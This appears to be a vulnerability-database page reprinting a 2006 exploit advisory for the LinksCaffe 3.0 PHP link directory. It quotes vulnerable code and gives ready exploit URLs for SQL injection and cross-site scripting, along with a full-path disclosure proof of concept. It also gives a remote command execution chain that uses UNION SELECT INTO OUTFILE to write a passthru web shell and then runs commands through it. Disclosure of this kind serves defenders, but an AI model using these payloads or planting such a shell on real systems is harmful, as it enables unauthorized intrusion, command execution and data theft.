LinksCaffe 3.0 SQL injection/Command Execution Vulnerabilties

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1053168 漏洞类型
发布时间 2006-07-27 更新时间 2006-07-27
CVE编号 CVE-2006-3883
CVE-2006-3884
CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2006070124
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
LinksCaffe 3.0 SQL injection/Command Execution Vulnerabilties

Produce       : LinksCaffe 3.0

Website       : http://gonafish.com/

Impact        : manupulation of data / system access

Discovered by : Simo64 - Moroccan Security Team

[+] SQL injection

******************

[1]Vulnerable code in line 223 in links.php

code :

$rime = mysql_query("SELECT * from links WHERE link_val like 'yes' AND cat_id LIKE '$cat' ORDER BY hits DESC, link_pop DESC, rate DESC LIMIT $offset, $limit") or die(mysql_error());

$offset and $limit vars are not sanitized before to be used to conducte sql injection attacks

Exploit :

http://localhost/linkscaffe/links.php?cat=1&offset=[SQL]

http://localhost/linkscaffe/links.php?cat=1&limit=[SQL]

[2]	Vulnerable code in line 516 in links.php

code :

if (!$newdays)

{

$newdays=$daysnew;

}

else

{

$newdays=$newdays;

}

$rime1 = mysql_query("SELECT COUNT(*) from links WHERE (to_days(NOW()) - to_days(links.date)) <= $newdays AND link_val = 'yes'") or die(mysql_error());

Exploit :

http://localhost/linkscaffe/links.php?action=new&newdays=[SQL]

[3]	Vulnerable code in line 516 in links.php

code :

if ($action=="deadlink")

{

........

$rime = mysql_query("SELECT * from links WHERE link_id=$link_id") or die(mysql_error());

while($row = mysql_fetch_array($rime)) {

extract($row);

echo "<li><font class=text10><a href='$link_url' target='_blank'>$link_name</a><br>$link_desc<br></font></li>";

echo "<input type = 'hidden' name = 'link_id' value='$link_id'><input type = 'hidden' name = 'cat_id' value='$cat_id'><input type = 'hidden' name = 'link_name' value='$link_name'>

<input type = 'hidden' name = 'link_url' value='$link_url'><input type = 'hidden' name = 'link_desc' value='$link_desc'><input type = 'hidden' name = 'link_email' value='$link_email'><br><input type = 'submit' value = 'Dead Link'>";

}

$link_id var are not sanitized before to be used to conducte sql injection attacks

Exploit :

http://localhost/linkscaffe/links.php?action=deadlink&link_id=[SQL]

[+] FullPath disclosure :

PoC :

http://localhost/linkscaffe/links.php?action=new&newdays=-1+UNION+SELECT
+123456/*

Result :

Warning: Supplied argument is not a valid MySQL result resource in /usr/home/simo64/linkscaffe/links.php on line 540

Warning: Supplied argument is not a valid MySQL result resource in /usr/home/simo64/linkscaffe/links.php on line 549

Warning: Supplied argument is not a valid MySQL result resource in /usr/home/simo64/linkscaffe/links.php on line 554

[+] Remote Command Execution

*****************************

if magic_quote_gpc == OFF we can create a shell in writable folder using (3)!!

Exploit :

http://localhost/linkscaffe/links.php?action=deadlink&link_id=-1+UNION+S
ELECT+0,0,0,0,'<?passthru($_GET['cmd']);?>',0,0,0,0,0,0,0,0,0,0%20INT
O%20OUTFILE%20'/usr/home/simo64/linkscaffe/pipo.php'/*

after we can exec cmds

http://localhost/linkscaffe/pipo.php?cmd=ls;id

[+] Cross Site Scripting

*************************

$tablewidth var in counter.php is not sanitized before to be used to conducte xss attacks

$newdays var in links.php is not sanitized before to be used to conducte xss attacks

$tableborder,$menucolor,$textcolor,$bodycolor vars in links.php are not sanitized before to be used to conducte xss attacks

PoC :

http://localhost/linkscaffe/counter.php?tablewidth='%3E[XSS]<p+

http://localhost/linkscaffe/links.php?action=new&newdays=[XSS]

http://localhost/linkscaffe/menu.inc.php?tableborder='%3E[XSS]

http://localhost/linkscaffe/menu.inc.php?menucolor='%3E[XSS]

http://localhost/linkscaffe/menu.inc.php?textcolor='%3E[XSS]

http://localhost/linkscaffe/menu.inc.php?bodycolor='%3E[XSS]

Contact : simo64 (at) gmail (dot) com [email concealed]

greetz to all friends !